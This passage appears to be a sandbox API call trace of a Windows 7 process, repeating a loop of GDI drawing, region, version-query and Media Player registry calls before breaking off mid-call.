[0092.451] DeleteObject (ho=0xef0401dc) returned 1 [0092.451] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.451] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.452] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.452] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.452] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.452] BeginPath (hdc=0x0) returned 0 [0092.452] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.452] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.452] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.452] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.452] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.452] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.452] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.452] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.457] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf20401d9 [0092.457] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf00401dc [0092.457] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x20478bd [0092.457] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x20478be [0092.457] CombineRgn (hrgnDst=0x20478bd, hrgnSrc1=0xf20401d9, hrgnSrc2=0xf00401dc, iMode=1) returned 1 [0092.457] CombineRgn (hrgnDst=0x20478be, hrgnSrc1=0xf20401d9, hrgnSrc2=0xf00401dc, iMode=4) returned 2 [0092.457] CreateSolidBrush (color=0xff) returned 0x21078bb [0092.457] CreateSolidBrush (color=0xff0000) returned 0x21078bc [0092.457] DeleteObject (ho=0x21078bc) returned 1 [0092.457] DeleteObject (ho=0xf00401dc) returned 1 [0092.457] DeleteObject (ho=0xf20401d9) returned 1 [0092.457] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.457] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.457] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.457] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.457] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.457] BeginPath (hdc=0x0) returned 0 [0092.457] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.457] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.457] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.457] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.457] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.457] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.458] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.458] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.458] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf10401dc [0092.458] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf30401d9 [0092.458] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478bf [0092.458] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478c0 [0092.458] CombineRgn (hrgnDst=0x10478bf, hrgnSrc1=0xf10401dc, hrgnSrc2=0xf30401d9, iMode=1) returned 1 [0092.458] CombineRgn (hrgnDst=0x10478c0, hrgnSrc1=0xf10401dc, hrgnSrc2=0xf30401d9, iMode=4) returned 2 [0092.458] CreateSolidBrush (color=0xff) returned 0x31078bc [0092.458] CreateSolidBrush (color=0xff0000) returned 0x11078c1 [0092.458] DeleteObject (ho=0x11078c1) returned 1 [0092.458] DeleteObject (ho=0xf30401d9) returned 1 [0092.458] DeleteObject (ho=0xf10401dc) returned 1 [0092.458] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.458] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.458] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.458] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.458] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.458] BeginPath (hdc=0x0) returned 0 [0092.458] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.458] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.458] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.458] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.458] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.458] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.458] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.458] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.459] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf40401d9 [0092.459] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf20401dc [0092.459] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478c2 [0092.459] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478c3 [0092.459] CombineRgn (hrgnDst=0x10478c2, hrgnSrc1=0xf40401d9, hrgnSrc2=0xf20401dc, iMode=1) returned 1 [0092.459] CombineRgn (hrgnDst=0x10478c3, hrgnSrc1=0xf40401d9, hrgnSrc2=0xf20401dc, iMode=4) returned 2 [0092.459] CreateSolidBrush (color=0xff) returned 0x21078c1 [0092.459] CreateSolidBrush (color=0xff0000) returned 0x11078c4 [0092.460] DeleteObject (ho=0x11078c4) returned 1 [0092.460] DeleteObject (ho=0xf20401dc) returned 1 [0092.460] DeleteObject (ho=0xf40401d9) returned 1 [0092.460] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.460] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.460] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.460] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.460] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.460] BeginPath (hdc=0x0) returned 0 [0092.460] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.460] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.460] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.460] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.460] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.460] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.460] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.460] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.460] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf30401dc [0092.460] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf50401d9 [0092.460] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478c5 [0092.460] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478c6 [0092.461] CombineRgn (hrgnDst=0x10478c5, hrgnSrc1=0xf30401dc, hrgnSrc2=0xf50401d9, iMode=1) returned 1 [0092.461] CombineRgn (hrgnDst=0x10478c6, hrgnSrc1=0xf30401dc, hrgnSrc2=0xf50401d9, iMode=4) returned 2 [0092.461] CreateSolidBrush (color=0xff) returned 0x21078c4 [0092.461] CreateSolidBrush (color=0xff0000) returned 0x11078c7 [0092.461] DeleteObject (ho=0x11078c7) returned 1 [0092.461] DeleteObject (ho=0xf50401d9) returned 1 [0092.461] DeleteObject (ho=0xf30401dc) returned 1 [0092.461] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.461] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.461] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.461] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.461] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.461] BeginPath (hdc=0x0) returned 0 [0092.461] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.461] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.461] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.461] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.461] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.461] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.461] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.461] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.461] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf60401d9 [0092.461] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf40401dc [0092.461] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478c8 [0092.461] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478c9 [0092.461] CombineRgn (hrgnDst=0x10478c8, hrgnSrc1=0xf60401d9, hrgnSrc2=0xf40401dc, iMode=1) returned 1 [0092.461] CombineRgn (hrgnDst=0x10478c9, hrgnSrc1=0xf60401d9, hrgnSrc2=0xf40401dc, iMode=4) returned 2 [0092.461] CreateSolidBrush (color=0xff) returned 0x21078c7 [0092.461] CreateSolidBrush (color=0xff0000) returned 0x11078ca [0092.462] DeleteObject (ho=0x11078ca) returned 1 [0092.462] DeleteObject (ho=0xf40401dc) returned 1 [0092.462] DeleteObject (ho=0xf60401d9) returned 1 [0092.462] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.462] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.462] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.462] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.462] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.462] BeginPath (hdc=0x0) returned 0 [0092.462] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.462] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.462] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.462] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.462] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.462] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.462] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.462] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.463] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf50401dc [0092.463] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf70401d9 [0092.463] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478cb [0092.463] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478cc [0092.463] CombineRgn (hrgnDst=0x10478cb, hrgnSrc1=0xf50401dc, hrgnSrc2=0xf70401d9, iMode=1) returned 1 [0092.463] CombineRgn (hrgnDst=0x10478cc, hrgnSrc1=0xf50401dc, hrgnSrc2=0xf70401d9, iMode=4) returned 2 [0092.463] CreateSolidBrush (color=0xff) returned 0x21078ca [0092.463] CreateSolidBrush (color=0xff0000) returned 0x11078cd [0092.463] DeleteObject (ho=0x11078cd) returned 1 [0092.463] DeleteObject (ho=0xf70401d9) returned 1 [0092.463] DeleteObject (ho=0xf50401dc) returned 1 [0092.463] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.463] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.463] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.463] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.463] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.463] BeginPath (hdc=0x0) returned 0 [0092.463] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.463] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.463] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.463] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.463] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.463] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.463] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.463] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.463] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf80401d9 [0092.464] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf60401dc [0092.464] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478ce [0092.464] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478cf [0092.464] CombineRgn (hrgnDst=0x10478ce, hrgnSrc1=0xf80401d9, hrgnSrc2=0xf60401dc, iMode=1) returned 1 [0092.464] CombineRgn (hrgnDst=0x10478cf, hrgnSrc1=0xf80401d9, hrgnSrc2=0xf60401dc, iMode=4) returned 2 [0092.464] CreateSolidBrush (color=0xff) returned 0x21078cd [0092.464] CreateSolidBrush (color=0xff0000) returned 0x11078d0 [0092.464] DeleteObject (ho=0x11078d0) returned 1 [0092.464] DeleteObject (ho=0xf60401dc) returned 1 [0092.464] DeleteObject (ho=0xf80401d9) returned 1 [0092.464] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.464] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.464] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.464] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.464] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.464] BeginPath (hdc=0x0) returned 0 [0092.464] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.464] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.464] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.464] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.464] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.464] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.464] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.464] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.464] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf70401dc [0092.464] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf90401d9 [0092.464] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478d1 [0092.464] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478d2 [0092.464] CombineRgn (hrgnDst=0x10478d1, hrgnSrc1=0xf70401dc, hrgnSrc2=0xf90401d9, iMode=1) returned 1 [0092.465] CombineRgn (hrgnDst=0x10478d2, hrgnSrc1=0xf70401dc, hrgnSrc2=0xf90401d9, iMode=4) returned 2 [0092.465] CreateSolidBrush (color=0xff) returned 0x21078d0 [0092.465] CreateSolidBrush (color=0xff0000) returned 0x11078d3 [0092.465] DeleteObject (ho=0x11078d3) returned 1 [0092.465] DeleteObject (ho=0xf90401d9) returned 1 [0092.465] DeleteObject (ho=0xf70401dc) returned 1 [0092.465] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.465] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.465] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.465] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.465] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.465] BeginPath (hdc=0x0) returned 0 [0092.465] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.465] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.465] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.465] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.465] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.465] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.465] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.465] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.465] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfa0401d9 [0092.465] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf80401dc [0092.465] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478d4 [0092.465] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10478d5 [0092.465] CombineRgn (hrgnDst=0x10478d4, hrgnSrc1=0xfa0401d9, hrgnSrc2=0xf80401dc, iMode=1) returned 1 [0092.465] CombineRgn (hrgnDst=0x10478d5, hrgnSrc1=0xfa0401d9, hrgnSrc2=0xf80401dc, iMode=4) returned 2 [0092.465] CreateSolidBrush (color=0xff) returned 0x21078d3 [0092.465] CreateSolidBrush (color=0xff0000) returned 0x11078d6 [0092.465] DeleteObject (ho=0x11078d6) returned 1 [0092.465] DeleteObject (ho=0xf80401dc) returned 1 [0092.465] DeleteObject (ho=0xfa0401d9) returned 1 [0092.466] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.466] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.466] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.466] SelectObject (hdc=0x0, 